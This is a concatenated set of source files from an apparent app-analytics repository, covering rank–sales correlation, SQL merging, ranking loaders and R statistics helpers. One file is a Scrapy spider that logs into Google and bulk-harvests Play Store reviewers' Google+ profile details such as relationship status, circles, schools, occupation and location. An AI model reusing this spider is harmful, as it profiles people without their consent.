while d <= end_date_inclusive:
yield d
d = d + datetime.timedelta(1)
return tuple(create())
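# Example (illustrative):
#   make_date_range(datetime.date(2013, 7, 1), datetime.date(2013, 7, 3))
# -> (date(2013, 7, 1), date(2013, 7, 2), date(2013, 7, 3)); both endpoints
#    are inclusive, unlike range().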
def read_ranks(date, ranking_store_str_filter, category_id_str_filter):
fn = '/Users/perezrafael/appannie/data/ranks/special/ranking_%s.sql' % date.strftime('%Y-%m-%d')
#fn = '/Users/riwatt/Work/new_ranks/ranking_%s.sql' % date.strftime('%Y-%m-%d')
print 'reading ranks from', fn
empty_rankings = 0
for line in open(fn):
line_split = line.split('\t')
ranking_date_str, ranking_store_str, ranking_category_str, ranking_feed_str, ranking_list_str_unsplit = line_split
assert ranking_date_str == date.strftime('%Y-%m-%d')
if ranking_store_str not in ranking_store_str_filter:
continue
if ranking_category_str not in category_id_str_filter:
continue
if ranking_list_str_unsplit == '\n':
empty_rankings += 1
continue
ranking_list_str_split = ranking_list_str_unsplit[:-1].split(' ')
for rank, app_id_str in enumerate(ranking_list_str_split, 1):
yield ranking_store_str, ranking_category_str, ranking_feed_str, rank, int(app_id_str)
print empty_rankings, 'empty rankings'
#@profile
def main():
    # A smaller category set, kept for reference:
    #FILTER_CATEGORY_IDS = ('36', '6014', '7006', '6005', '6007', '6016')
FILTER_CATEGORY_IDS = (
'36',
'6000',
'6001',
'6002',
'6003',
'6004',
'6005',
'6006',
'6007',
'6008',
'6009',
'6010',
'6011',
'6012',
'6013',
'6014',
'6015',
'6016',
'6017',
'6018',
'6020',
'6021',
'6023',
'7001',
'7002',
'7003',
'7004',
'7005',
'7006',
'7007',
'7008',
'7009',
'7010',
'7011',
'7012',
'7013',
'7014',
'7015',
'7016',
'7017',
'7018',
'7019'
)
FILTER_FEED_IDS = (
'0',
'1',
'2',
'100',
'101',
'102',
)
FILTER_ACTUALS = (
('sales', 'revenue'),
('downloads', 'units'),
)
FILTER_STORE_IDS = (
# P1
'143441',
'143444',
'143465',
'143462',
'143455',
# P2
'143460',
'143443',
'143442',
'143469',
'143450',
)
DATES = make_date_range(datetime.date(2013, 7, 2), datetime.date(2013, 8, 12))
assert len(DATES) > 1, 'plotter needs at least 1 day to determine the size of the figure'
try_mkdir('data')
    total_loops = len(DATES) * len(FILTER_CATEGORY_IDS) * len(FILTER_FEED_IDS) * len(FILTER_ACTUALS) * len(FILTER_STORE_IDS)
loop_count = 0
none_count = 0
writer = csv.writer(open('corr-results-%s.csv' % time.time(), 'w'))
writer.writerow(['date', 'store_id', 'value_type', 'category_id', 'feed_id', 'rank_limit', 'actuals_count', 'rank_transform_name', 'value_transform_name', 'corr', 'pval'])
for date in DATES:
rankfile_df = pd.DataFrame(list(read_ranks(date, FILTER_STORE_IDS, FILTER_CATEGORY_IDS)),
columns=['store_id_str', 'category_id_str', 'feed_id_str', 'Rank', 'App ID'])
for store_id_str in FILTER_STORE_IDS:
for (table_name, value_type) in FILTER_ACTUALS:
ranks_in_store_df = rankfile_df[rankfile_df['store_id_str'] == store_id_str]
sales_df = pd.DataFrame(list(read_sales(date, int(store_id_str), value_type, table_name)))
if not len(sales_df):
print 'no actuals for', date, store_id_str, value_type
continue
assert len(ranks_in_store_df)
merged_df = pd.merge(ranks_in_store_df, sales_df, on='App ID')
assert list(set(merged_df['store_id_str'])) == [store_id_str]
del merged_df['store_id_str']
del merged_df['App ID']
for (category_id_str, feed_id_str), group in merged_df.groupby(['category_id_str', 'feed_id_str']):
for rank_limit in (300, 1000, 1500):
for (rank_transform, value_transform) in itertools.product([float, math.log], repeat=2):
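                            # Four combinations of identity/log transforms on
                            # rank and value; the log-log case amounts to
                            # checking a power-law relation between rank and
                            # sales.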
df = group[group['Rank'] <= rank_limit]
actuals_count = len(df)
if actuals_count == 0:
continue
corr, pval = scipy.stats.pearsonr(df['Rank'].apply(rank_transform),
df['Value'].apply(value_transform))
row = [date, store_id_str, value_type, category_id_str, feed_id_str, rank_limit, actuals_count, rank_transform.__name__, value_transform.__name__, corr, pval]
writer.writerow(row)
if __name__ == '__main__':
main()
<file_sep>/audience/google-plus-scraping/lib/scraper/scraper/spiders/googleplus.py
# -*- coding: utf-8 -*-
import pandas as pd
import re
import scrapy
from ..items import ScraperItem
from ..constants import DIV_PATHS, SCRAPE_ACCOUNT
from scrapy import FormRequest, Request, log
from scrapy.shell import inspect_response
class GoogleplusSpider(scrapy.Spider):
"""
Spider for scraping Google+ profiles. Loads IDs from the column id in the file play_reviewers.csv.
"""
name = "googleplus"
allowed_domains = ["google.com"]
reviewers = pd.read_csv('play_reviewers.csv', index_col=False)
start_urls = ['https://accounts.google.com/']
base_url = 'https://plus.google.com/'
profile_urls = None
n_yielded = 0
batch_size = 15000
handle_httpstatus_list = [404]
def parse(self, response):
"""
Login to Google+.
:param response: Response object
:return: Request object
"""
return [FormRequest.from_response(
response,
formdata=SCRAPE_ACCOUNT,
callback=self.start_post_login_process)
]
def start_post_login_process(self, response):
"""
Start login process: fail if unsuccessful, begin scraping otherwise.
:param response: Response object
:return: Request object to scrape
"""
if response.url in ('https://www.google.com/settings/personalinfo', 'https://myaccount.google.com/?pli=1'):
self.log("Login successful", level=log.INFO)
else:
self.log("Login failed", level=log.ERROR)
self.profile_urls = self._generate_profile_urls()
yield self._get_new_profile_url_request()
def _generate_profile_urls(self):
"""
Generate profile URLs from reviewer IDs.
:return: List with profile URLs to scrape
"""
profile_urls = [self.base_url + str(reviewer_id) + '/about' for reviewer_id in self.reviewers.id]
return profile_urls
def _get_new_profile_url_request(self):
"""
Get a new Request.
:return: Request object
"""
new_profile_url = self.profile_urls[self.n_yielded]
self.n_yielded += 1
return Request(url=new_profile_url, callback=self.parse_profile_page)
def parse_profile_page(self, response):
"""
Parse the profile page.
:param response: Response object
:return: Scrapy item
"""
crawl_stats = self.crawler.stats.get_stats()
n_parsed = crawl_stats.get('item_scraped_count', 0)
self.log('# yielded: %s' % self.n_yielded)
self.log('# parsed: %s' % n_parsed)
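        # Refill the crawl frontier in chunks of batch_size while the backlog
        # of yielded-but-unparsed requests stays below batch_size.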
if self.n_yielded < len(self.profile_urls) and self.n_yielded - n_parsed < self.batch_size:
for ii in range(self.batch_size):
if self.n_yielded < len(self.profile_urls):
yield self._get_new_profile_url_request()
self.log('NEW YIELDS')
self.log('# yielded: %s' % self.n_yielded)
self.log('# parsed: %s' % n_parsed)
        # Scrapy reports the HTTP status as an integer
        if response.status == 404:
            return
item = ScraperItem()
item[u'account_id'] = self._get_account_id(response)
item[u'account_name'] = self._get_account_name(response)
        # Only parse the sections that are actually present on the profile
        if len(response.xpath(DIV_PATHS['basic_information']).extract()) > 0:
            item = self._parse_basic_information(response, item)
        if len(response.xpath(DIV_PATHS['apps_signin']).extract()) > 0:
            item[u'apps_with_signin'] = self._parse_signin_apps(response)
        if len(response.xpath(DIV_PATHS['in_circles']).extract()) > 0:
            item[u'in_circles'] = self._parse_in_circles(response)
        if len(response.xpath(DIV_PATHS['education']).extract()) > 0:
            item[u'school_names'] = self._parse_education(response)
        if len(response.xpath(DIV_PATHS['work']).extract()) > 0:
            item[u'occupation'] = self._parse_work(response)
        if len(response.xpath(DIV_PATHS['places']).extract()) > 0:
            item[u'place'] = self._parse_places(response)
yield item
def _get_account_id(self, response):
"""
Get the account ID from the response url.
:param response: Response object
:return: String with account ID
"""
try:
account_id = re.search(r"plus.google.com/([0-9]*)", response.url).groups()[0]
except AttributeError:
account_id = u""
return account_id
def _get_account_name(self, response):
"""
Get the account name.
:param response: Response object
:return: String with account name
"""
temp = response.xpath(DIV_PATHS['account_name']).extract()
account_name = temp[0] if len(temp) == 1 else ''
return account_name
def _parse_basic_information(self, response, item):
"""
Parse Basic Information DIV_PATHS and return all properties.
:param response: Response object
:param item: Scrapy item
:return: Adjusted Scrapy item with basic information
"""
keys = response.xpath(DIV_PATHS['basic_information'] + DIV_PATHS['basic_information_keys']).extract()
keys = [key.lower().replace(' ', '_') for key in keys]
values = response.xpath(DIV_PATHS['basic_information'] + DIV_PATHS['basic_information_values']).extract()
for key, value in zip(keys, values):
item[key] = self._remove_default_information(key, value)
return item
def _remove_default_information(self, key, value):
"""
        Remove default placeholder text from the Basic Information fields, so boilerplate strings are not stored as user data.
:param key: Key of Scrapy item
:param value: Value of Scrapy item
:return: String with default information removed if present
"""
DEFAULTS = {u'gender': u'',
u'looking_for': u'Who are you looking for?',
u'other_names': u'For example: maiden name, alternate spellings',
u'relationship': u'Seeing anyone?'
}
is_default_information = (key in DEFAULTS) and (DEFAULTS[key] == value)
return u'' if is_default_information else value
def _parse_signin_apps(self, response):
"""
Parse Apps with Google+ Sign-in DIV_PATHS and return names of apps.
:param response: Response object
:return: List with names of apps
"""
values = response.xpath(DIV_PATHS['apps_signin'] + DIV_PATHS['apps_signin_values']).extract()
if len(values) == 0:
values = ''
return values
def _parse_in_circles(self, response):
"""
Parse People DIV_PATHS and return G+ IDs of people having the profile in circle.
:param response: Response object
:return: List with G+ IDs
"""
values = response.xpath(DIV_PATHS['in_circles'] + DIV_PATHS['in_circles_values']).extract()
values = [profile_id[2:] for profile_id in values]
return values
def _parse_education(self, response):
"""
Parse the Education DIV_PATHS and return all schools.
:param response: Response object
:return: List with name of schools
"""
values = response.xpath(DIV_PATHS['education'] + DIV_PATHS['school_names']).extract()
return values
def _parse_work(self, response):
"""
Parse the Work DIV_PATHS and return the occupation.
:param response: Response object
:return: String with occupation
"""
occupation = ""
for current_div in response.xpath(DIV_PATHS['work']):
key = current_div.xpath(DIV_PATHS['work'] + "/div[contains(@class, 'Cr')]/text()").extract()
if len(key) > 0 and key[0] == u"Occupation":
temp = current_div.xpath(DIV_PATHS['work'] + "/div[contains(@class, 'y4')]/text()").extract()
occupation = temp[0] if len(temp) == 1 else temp
return occupation
def _parse_places(self, response):
"""
Parse the Places DIV_PATHS and return current place.
:param response: Response object
:return: String with current place
"""
place = ""
for current_div in response.xpath(DIV_PATHS['places']):
key = current_div.xpath(DIV_PATHS['places'] + "/div[contains(@class, 'Cr')]/text()").extract()
if len(key) > 0 and key[0] == u"Currently":
temp = current_div.xpath(DIV_PATHS['places'] + "/div[contains(@class, 'adr y4')]/text()").extract()
place = temp[0] if len(temp) == 1 else temp
return place
<file_sep>/tooling/merge_sql_files.py
#!/usr/bin/env python
__author__ = 'srhmtonk'
import glob
import re
from natsort import natsort
import time
import argparse
import datetime
def merge_sql_files(path_pattern, name=None):
"""
Merges SQL files given by glob pattern.
"""
files = glob.glob(path_pattern)
# natural order sorting
files = natsort(files)
if len(files) == 0:
print("Sorry, no files found!")
return None
if name is None:
stamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y%m%dT%H%M%S')
f = open('merged%s.out'%stamp, 'w')
else:
f = open(name,'w')
for current_file in files:
sql_file = open(current_file, 'r')
sql_text = sql_file.read()
# Remove single line comments and non greedy filter out block
# comments.
line_comment_filter = re.compile("--.*")
block_comment_filter = re.compile("\/\*.*?\*\/", re.DOTALL)
sql_text = block_comment_filter.sub('', sql_text)
sql_text = line_comment_filter.sub('', sql_text)
search_set_delim = re.search('(delimiter\s*)(\S+)\s*', sql_text,
re.IGNORECASE)
if search_set_delim:
new_delim = re.escape(search_set_delim.group(2))
set_delim = search_set_delim.group(1) + new_delim + ".*"
set_delimiter_filter = re.compile(set_delim, re.IGNORECASE)
sql_text = set_delimiter_filter.sub('', sql_text)
new_delim_filter = re.compile(new_delim)
sql_text = new_delim_filter.sub(';', sql_text)
default_delim_filter = re.compile("delimiter\s*;\s*")
sql_text = default_delim_filter.sub('', sql_text)
# Two step filtering out empty sql statements
sql_text = re.sub('(;\\s*;)', ';', sql_text)
sql_text = re.sub('(;\\s*;)', ';', sql_text)
f.write('\n/*\nfile: %s\n*/\n'%current_file)
f.write(sql_text)
f.close()
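
# Example invocation (illustrative):
#   ./merge_sql_files.py --pattern "migrations/*.sql" --name merged.sql
# Single-line and block comments are stripped and DELIMITER directives are
# normalised to ';', so the merged file can be piped straight into a client.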
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='merge_sql_files',
description="Merges the contents of sql files with into a single file.")
parser.add_argument('--pattern', help='Path pattern used for matching files, default "./*.sql"')
    parser.add_argument('--name', help='Name of output file, default "merged<timestamp>.out"')
args = parser.parse_args()
merge_sql_files("./*.sql" if args.pattern is None else args.pattern, name=args.name)<file_sep>/rankings/rankings/__init__.py
__author__ = 'hgriffioen'
import db
import os
import pandas as pd
ANDROID_RANKING_PATH = '/s3mnt/ranks_android/Android-Ranking-{date}.csv.bz2'
IOS_RANKING_PATH = '/s3mnt/ranks_ios/ranking_{date}.sql.bz2'
def load_pgpass_credentials():
    path = os.path.join(os.path.expanduser('~'), '.pgpass')
username = password = None
if os.path.exists(path):
with open(path, 'r') as f:
pgpass = f.readlines()[0].strip().split(':')
username, password = pgpass[-2:]
return username, password
class Platform(object):
def query(self, q):
raise NotImplementedError("Subclass should implement method query()")
class Android(Platform):
    # Credentials default to None and are then read from ~/.pgpass
    def __init__(self, username=None, password=None,
                 hostname='ds-db-1.appannie.org'):
super(Android, self).__init__()
if not username or not password:
username, password = load_pgpass_credentials()
self.android_db = db.DB(
username=username,
            password=password,
hostname=hostname,
dbname='aa_android',
dbtype='postgres'
)
@property
def store_ids(self):
return self.android_db.query("""
select
id as store_id,
code as iso_code
from
store
""")
@property
def category_ids(self):
return self.android_db.query("""
select
id as category_id,
name as category
from
category
""")
@property
def bundle_ids(self):
return self.android_db.query("""
select
id as app_id,
class as bundle_id
from
app
""")
@property
def feeds(self):
return pd.DataFrame({
'feed_id': [0, 1, 2, 3, 4],
'feed': [
'free', 'paid',
'grossing', 'grossing_iap',
'grossing_non_iap'
]})
def query(self, q):
return self.android_db.query(q)
def rankings_daily(self, date):
df = self._load_compressed_rankings(ANDROID_RANKING_PATH.format(date=date))
return self._parse_rankings(df)
def _load_compressed_rankings(self, path):
df = pd.read_csv(path, names=['date', 'iso_code', 'category', 'feed_id', 'ranks'],
compression='bz2')
return df
def _parse_rankings(self, df):
id_cols = ['date', 'iso_code', 'category', 'feed_id']
long_df = (df
.set_index(id_cols)
['ranks'].str.split(" ")
.apply(pd.Series)
.stack())
rankings = pd.DataFrame(long_df.str.split('-').values.tolist(),
columns=['rank', 'bundle_id'],
index=long_df.index)
rankings.reset_index(level=range(0, len(id_cols)), inplace=True)
return rankings
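
    # Illustrative shape of _parse_rankings: an input row such as
    #   date=2013-07-01, iso_code=US, category=GAME, feed_id=0,
    #   ranks='1-com.a 2-com.b'
    # is exploded into one row per app:
    #   rank=1, bundle_id=com.a  /  rank=2, bundle_id=com.b
    # with the identifying columns repeated on every row.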
class iOS(Platform):
    # Credentials default to None and are then read from ~/.pgpass
    def __init__(self, username=None, password=None,
                 hostname='ds-db-1.appannie.org'):
super(iOS, self).__init__()
if not username or not password:
username, password = load_pgpass_credentials()
self.ios_db = db.DB(
username=username,
            password=password,
hostname=hostname,
dbname='aa',
dbtype='postgres'
)
@property
def store_ids(self):
return self.ios_db.query("""
select
id as store_id,
country_code as iso_code
from
webanalytics_store
""")
@property
def category_ids(self):
return self.ios_db.query("""
select
id as category_id,
name as category
from
webanalytics_category
""")
@property
def bundle_ids(self):
return self.ios_db.query("""
select
id as app_id,
bundle_id
from
aa_app
""")
@property
def feeds(self):
return pd.DataFrame({
'feed_id': [0, 1, 2, 100, 101, 102],
'feed': [
"IPHONE_FREE", "IPHONE_PAID",
"IPHONE_GROSSING", "IPAD_PAID",
"IPAD_FREE", "IPAD_GROSSING",
]})
def query(self, q):
return self.ios_db.query(q)
def rankings_daily(self, date):
df = self._load_compressed_rankings(IOS_RANKING_PATH.format(date=date))
return self._parse_rankings(df)
def _load_compressed_rankings(self, path):
df = pd.read_table(path,
names=['date', 'store_id', 'category_id', 'feed_id', 'ranks'],
index_col=False,
compression='bz2')
return df
def _parse_rankings(self, df):
id_cols = ['date', 'store_id', 'category_id', 'feed_id']
long_df = (df
.set_index(id_cols)
['ranks'].str.split(" ")
.apply(pd.Series)
.stack())
rankings = (long_df
.reset_index()
.rename(columns={'level_4': 'rank', 0: 'app_id'}))
return rankings<file_sep>/aa_au_model/r_scripts/user_def.R
##########################
### ###
### USER-DEF FUNCTIONS ###
### ###
##########################
#################
# load packages #
#################
library(stringr)
library(RCurl)
library(calibrate)
library(RJSONIO)
library(plyr)
library(httr)
library(maps)
library(forecast)
library(fpc)
library(ROCR)
library(cluster)
##############################
# generate sequence of dates #
##############################
readDate = function(dateStart,dateEnd){
# remove all dashes
date_start = gsub("-","",dateStart)
date_end = gsub("-","",dateEnd)
# prepare as data type
date_start = paste(substr(date_start,1,4),"-",substr(date_start,5,6),"-",substr(date_start,7,8),sep="")
date_end = paste(substr(date_end,1,4),"-",substr(date_end,5,6),"-",substr(date_end,7,8),sep="")
date_reg = seq(as.Date(date_start),as.Date(date_end),by="1 day")
date_reg = as.character(date_reg)
return(date_reg)
}
##########################
# process file with data #
##########################
readFile = function(filename){
# check file size
size_file = file.info(filename)$size
# detect if file is gz or simple text
detect_gz = str_detect(filename,".gz")
# read table
if(detect_gz){
if(size_file > 20){
day = read.delim(gzfile(filename),sep="\t",stringsAsFactors=F,check.names=F,header=F)
} else {
return(NULL)
}
} else {
if(size_file > 0){
day = read.delim(filename,sep="\t",stringsAsFactors=F,check.names=F,header=F)
} else {
return(NULL)
}
}
# return matrix
return(day)
}
#############################
# process folder with files #
#############################
readFolder = function(folder_name, date_range){
# initialize empty
collected_data = NULL
# loop over selected folders
for (dd in date_range){
# enter day folder
new_folder = paste(folder_name,dd,sep="/")
# detect how many files there are
detect_files = list.files(new_folder,pattern="part")
if(length(detect_files) == 0){
# prompt error missing files
cat(paste("There are no files to read for ",dd,"!!\n",sep=""))
} else {
# read data from files
cat(paste("Processing files for ",dd,"...\n",sep=""))
for(i in 1:length(detect_files)){
collected_data = rbind(collected_data,readFile(paste(new_folder,detect_files[i],sep="/")))
}
}
}
# announce finish of data processing
cat("Finished file processing!\n")
# return data frame
return(collected_data)
}
################################
# compute number of unique #
# devices for a date range #
################################
count_devices_date = function(dataset, start_date, end_date){
# count number of unique devices
mm = length(unique(dataset[dataset$gmt_date >= start_date & dataset$gmt_date <= end_date,'device_id']))
# return value
return(mm)
}
###############################
# compute number of unique #
# devices for a specified app #
###############################
count_devices_app = function(dataset, app_name){
# count number of unique devices
mm = length(unique(dataset[dataset$bundle_id == app_name,'device_id']))
# return value
return(mm)
}
####################################
# compute number of unique devices #
# for a specified app and date #
####################################
count_devices_app_date = function(dataset, app_name, start_date, end_date){
# count number of unique devices
mm = length(unique(dataset[dataset$gmt_date >= start_date & dataset$gmt_date <= end_date & dataset$bundle_id == app_name,'device_id']))
# return value
return(mm)
}
#######################################
# make URL for API requests #
# authentication details using 'httr' #
#######################################
# leaderboards (feed=free/paid/gross)
url_lb = function(country, category, feed, rank, time.frame, start_date, device) {
root = "https://api.appannie.com/v1.1/intelligence/apps/ios/"
# paste to root
u = paste(root, "ranking?countries=", country, "&categories=", category, "&feeds=", feed,
"&ranks=", rank, "&granularity=", time.frame, "&date=", start_date, "&device=", device, sep = "")
return(URLencode(u))
}
# app history (feed=downloads/revenue)
url_app = function(country, feed, device, time.frame, start_date, end_date, app_id) {
root = "https://api.appannie.com/v1.1/intelligence/apps/ios/app/"
# paste to root
u = paste(root, app_id, "/history?countries=", country, "&feeds=", feed, "&device=", device,
"&granularity=", time.frame, "&start_date=", start_date, "&end_date=", end_date, sep = "")
return(URLencode(u))
}
########################################
# Process content from the GET request #
########################################
result = function(ind_req, country='US',category='Overall', feed,rank=10,time.frame='daily',start_date,end_date=start_date,device='iphone',app_id=0000){
# get the url
if(ind_req == 'lb'){
make_url = url_lb(country,category,feed,rank,time.frame,start_date,device)
loop = 1:rank
} else if(ind_req == 'app'){
make_url = url_app(country,feed, device,time.frame, start_date, end_date, app_id)
loop = 1:(1+as.numeric(difftime(end_date,start_date,units="days")))
} else {
stop("Uknown request!")
}
# send the request
make_call = GET(url = make_url, add_headers(Authorization = "bearer <KEY>"))
# read the JSON content
get_data = fromJSON(content(make_call,type="text"),simplify = FALSE)
# process the data
data_out = NULL
if(get_data$code == '200'){
# read app info per rank
for(i in loop){
if(ind_req == 'lb'){
day = c(get_data$end_date, get_data$list[[i]]$product_name, i, get_data$list[[i]]$estimate)
} else {
day = c(get_data$list[[i]]$date, get_data$product_name, get_data$list[[i]]$estimate)
}
data_out = rbind(data_out,day)
}
}
# return result
return(data_out)
}
########################
# Process POST request #
########################
# get app_id from bundle_id
get_app_id = function(bundle_id){
# make the request
make_call = POST(url = "https://api-internal.appannie.com/internal/v1.1/apps/ios/codes2ids",
body=paste("codes=",paste(bundle_id,collapse=","),sep=""), add_headers(Authorization = "bearer <KEY>"))
# extract data
get_data = fromJSON(content(make_call,type="text"),simplify = FALSE)
data_out = NULL
if(get_data$code == '200') {
for(i in 1:length(bundle_id))
if(is.null(get_data$items[[i]]$product_id)){
cat(paste("NULL product_id for bundle_id:",get_data$items[[i]]$code_name,"\n"))
} else {
data_out = rbind(data_out,c(get_data$items[[i]]$code_name,get_data$items[[i]]$product_id))
}
}
return(data_out)
}
###################
# Process LB data #
###################
pull_lb_data = function(rangeDate,feed,rank){
data_out = ldply(rangeDate, function(x) data.frame(result(ind_req='lb',start_date=x,feed=feed,rank=rank),stringsAsFactors=F,row.names=NULL))
colnames(data_out) = c("date","app_name","rank","estimate")
data_out$estimate = as.numeric(data_out$estimate)
return(data_out)
}
###################
# Process app ids #
###################
pull_app_id = function(bundle_id){
data_out = data.frame(get_app_id(bundle_id),stringsAsFactors=F,row.names=NULL)
colnames(data_out) = c("bundle_id","app_id")
data_out$app_id = as.numeric(data_out$app_id)
return(data_out)
}
###################
# Process app ids #
###################
pull_app_data = function(start_date,end_date,feed,app_id){
ll = length(app_id)
data_out = ldply(1:ll, function(x) data.frame(result(ind_req='app',start_date=start_date,end_date=end_date,feed=feed,app_id=app_id[x]),stringsAsFactors=F,row.names=NULL))
colnames(data_out) = c("date","app_name","estimate")
data_out$estimate = as.numeric(data_out$estimate)
return(data_out)
}
###################################
# Rescale from [min,max] to [a,b] #
###################################
rescale_value = function(x,a,b){
new_x = (b-a) * (x - min(x,na.rm=T)) / (max(x,na.rm=T) - min(x,na.rm=T)) + a
return(new_x)
}
######################
# K-means clustering #
######################
do_clustering = function(dataset){
# optimal number of clusters
pamk.best = pamk(dataset)
cat("number of clusters estimated:", pamk.best$nc, "\n")
    # distribute points into clusters (tiny sd jitter breaks ties between
    # identical rows without materially moving the data)
    into_cluster = pam(dataset + rnorm(nrow(dataset), sd=1e-19), pamk.best$nc)
# visualize the clusters
plot(into_cluster, main="Cluster visualization", labels=5, lines=0, xaxt="n", yaxt="n",bty="n", xlab="",ylab="")
cluster_apps = list()
# get apps within cluster
for(i in 1:pamk.best$nc){
# select all devices within cluster
cluster_dev = dataset[which(into_cluster$clustering==i),]
# used apps
counts = which(apply(cluster_dev,2,sum) > 0)
cluster_apps[[i]] = unique_apps[counts]
}
return(cluster_apps)
}
####################################
# Domain percentage in web traffic #
####################################
get_browser_pp = function(browser,dataset){
# initialize
result = NULL
# process data
for(i in 1:length(browser)){
select_rows = which(str_detect(dataset$bundle_id,fixed(browser[i])) * str_detect(dataset$URL,fixed("http://")) == TRUE)
browser_url = dataset[select_rows,'URL']
ca_browser = which(str_detect(browser_url,fixed(".ca/"))==TRUE)
com_browser = which(str_detect(browser_url,fixed(".com/"))==TRUE)
net_browser = which(str_detect(browser_url,fixed(".net/"))==TRUE)
org_browser = which(str_detect(browser_url,fixed(".org/"))==TRUE)
pp_ca = round(length(ca_browser) / length(browser_url),2)
pp_com = round(length(com_browser) / length(browser_url),2)
pp_net = round(length(net_browser) / length(browser_url),2)
pp_org = round(length(org_browser) / length(browser_url),2)
result = rbind(result, c(pp_ca,pp_com,pp_net,pp_org))
}
colnames(result) = c('CA','COM','NET','ORG')
rownames(result) = browser
# return result
return(result)
}
#########################
# Page views percentage #
#########################
get_page_views = function(browser,dataset,rangeDate){
# initialize
count = NULL
# process data
for(i in 1:length(browser)){
ind = which(str_detect(unique_apps,browser[i]))
nr_pages = sapply(1:length(rangeDate), function(j) length(which(dataset$bundle_id == unique_apps[ind] & dataset$gmt_date == rangeDate[j])))
count = rbind(count,nr_pages)
}
total = apply(count,2,sum)
result = t(sapply(1:length(browser), function(i) count[i,]/total))
rownames(result) = browser
colnames(result) = rangeDate
  # return results
return(result)
}
############################
# Plot sample size results #
############################
plot_app = function(app_to_plot,ind_ff=1,bar=T){
# define plotting area
nr_plots = ceiling(length(response_rate)/2)
par(mfrow=c(nr_plots,length(response_rate)-nr_plots),las=1,mar=c(4,4.7,2,0),oma=c(0,0,0,0))
col_all=rainbow(length(zz_conf))
# select data to plot
for(rr in response_rate){
ind_rr = which(response_rate == rr)
# select from proportion or mean estimation for barchart
if(bar){
par(mar=c(4,4,2,0))
if(ind_ff == 1){
data_to_plot = t(sample_size[app_to_plot,ind_rr,,])
max_val = apply(sample_size[app_to_plot,ind_rr,,],2,max)
} else if(ind_ff == 2){
data_to_plot = t(sample_size_prop[app_to_plot,ind_rr,,])
max_val = apply(sample_size_prop[app_to_plot,ind_rr,,],2,max)
} else {
cat("Unknown indicator data selection\n")
}
# plot the data
barplot(data_to_plot,col=col_all,main=paste("VPN usage: ",100*rr,"%",sep=""),beside=T,axes=F,xlab="Precision margin to true DAU")
axis(2,at = c(0,max_val),labels = formatC(c(0,max_val),format="d",big.mark=","))
} else {
data_to_plot = t(sample_size_prop_perc[app_to_plot,ind_rr,,])
max_val = apply(sample_size_prop_perc[app_to_plot,ind_rr,,],2,max)
ylim = c(log(min(data_to_plot)),log(max(data_to_plot)))
plot(log(sort(data_to_plot[1,])), type="b", lwd = 2, col=col_all[1], ylim=ylim,
main=paste("VPN usage: ",100*rr,"%",sep=""), axes=F,
xlab=expression(paste("Precision margin (fraction of sample ",italic(p),")",sep="")),ylab="")
for(i in 2:length(zz_conf)) lines(log(sort(data_to_plot[i,])), type = "b", lwd = 2, col=col_all[i])
axis(1, at = seq(1,all_marg_error), labels = paste(rev(marg_error_prop * 100),"%",sep=""))
#ylab = seq(ylim[1], ylim[2], length.out = all_marg_error - 1)
ylab = c(ylim[1],log(rev(data_to_plot[2,])),ylim[2])
axis(2, at = ylab, labels = formatC(c(min(data_to_plot),rev(data_to_plot[2,]),max(data_to_plot)),format="d",big.mark=","))
#axis(4, at = log(max_val), labels = formatC(max_val,format="d",big.mark=","))
five_perc_ind = which(marg_error_prop == 0.05) - 1
segments(x0=all_marg_error - five_perc_ind, y0=log(data_to_plot[1,all_marg_error]), y1=ylab[all_marg_error - five_perc_ind + 1], lty=3,lwd=2)
segments(x0=1, y0=ylab[all_marg_error - five_perc_ind+1], x1=all_marg_error - five_perc_ind, lty=3,lwd=2)
}
}
# add extra plot for legend and other information
nr_empty_plots = nr_plots * (length(response_rate) - nr_plots) - length(response_rate)
for(i in 1:nr_empty_plots) plot(1, type="n", axes=F, xlab="", ylab="")
title(sel_bundle_id[app_to_plot],line = -6, cex=1.5)
if(ind_ff == 2 || bar == F) textxy(c(0.8,0.88),c(0.8,0.82), labs = c(expression(paste(italic(p)," = ")),paste(round(dau_app_perc[app_to_plot]*100),"%",sep="")),cex=1.25)
legend("bottomright",leg=paste(100*conf_int,"%",sep=""),col=col_all,cex=1.25,pch=15,bty="n")
par(mfrow=c(1,1))
}
###########################################################
# compute wMAPE (weighted mean absolute percentage error) #
###########################################################
wmape = function(y,yhat){
ll = length(y)
mm = sum(abs(yhat-y))/sum(y)
return(mm)
}
##########################################
# compute RMSD (root mean squared error) #
##########################################
rmsd = function(y,yhat){
ll = length(y)
mm = sqrt(sum((yhat-y)^2)/ll)
return(mm)
}
################################
# Compute duration + frequency #
################################
compute_metric = function(dataset, app_name, start_date, end_date, metric=c("duration","frequency","AU"), include_zero=T, per_day=F){
# select info from data set
if(include_zero){
sel_dataset = dataset[dataset$bundle_id == app_name & dataset$gmt_date >= start_date & dataset$gmt_date <= end_date,]
} else{
sel_dataset = dataset[dataset$bundle_id == app_name & dataset$gmt_date >= start_date & dataset$gmt_date <= end_date & dataset$session_length > 0,]
}
# count number of active users
sel_device = unique(sel_dataset$device_id)
result = NULL
# calculate metric
for(i in 1:length(metric)){
# identify metric
if(metric[i] == "duration"){
# compute metric
result = c(result, round(mean(as.numeric(sel_dataset$session_length) / 60),3))
}
if (metric[i] == "frequency"){
# number of sessions
nr_sessions = nrow(sel_dataset)
# number of devices
nr_devices = length(sel_device)
# compute metric
if(per_day){
        result = c(result, round(nr_sessions / nr_devices / as.numeric(difftime(end_date, start_date, units="days") + 1), 3))
} else {
result = c(result, round(nr_sessions / nr_devices,3))
}
}
if(metric[i] == "AU"){
result = c(result, length(sel_device))
}
}
# return result
return(result)
}
###########################
# Calculate sample size #
##########################
calculate_sample = function(apps,device_type,response_rate,marg_error,conf_int,design,perc=T){
# initialize
sample_size = list()
nr_apps = length(apps)
all_marg_error = length(marg_error)
zz_conf = round(sapply((1+conf_int)/2,qnorm),3)
D = design
# compute
for(dev in device_type){
# initialize per device type
sample_size[[dev]] = array(NA, dim=c(nr_apps,length(response_rate),all_marg_error,length(zz_conf)),dimnames=list(unique_apps,response_rate,marg_error_prop,conf_int))
# compute for all apps
for(i in 1:nr_apps){
# compute for all levels of response rate
for(rr in response_rate){
ind_rr = which(response_rate == rr)
# compute for all margins of error
for(j in 1:all_marg_error){
          # compute for all confidence levels
for(zz in zz_conf){
ind_zz = which(zz_conf == zz)
ind_dev = which(dev_type == dev)
error_prop = ifelse(perc, marg_error[j] * sample_average_au[i,dev], marg_error[j])
var = sample_average_au[i,ind_dev] * (1 - sample_average_au[i,ind_dev])
# sample size formula
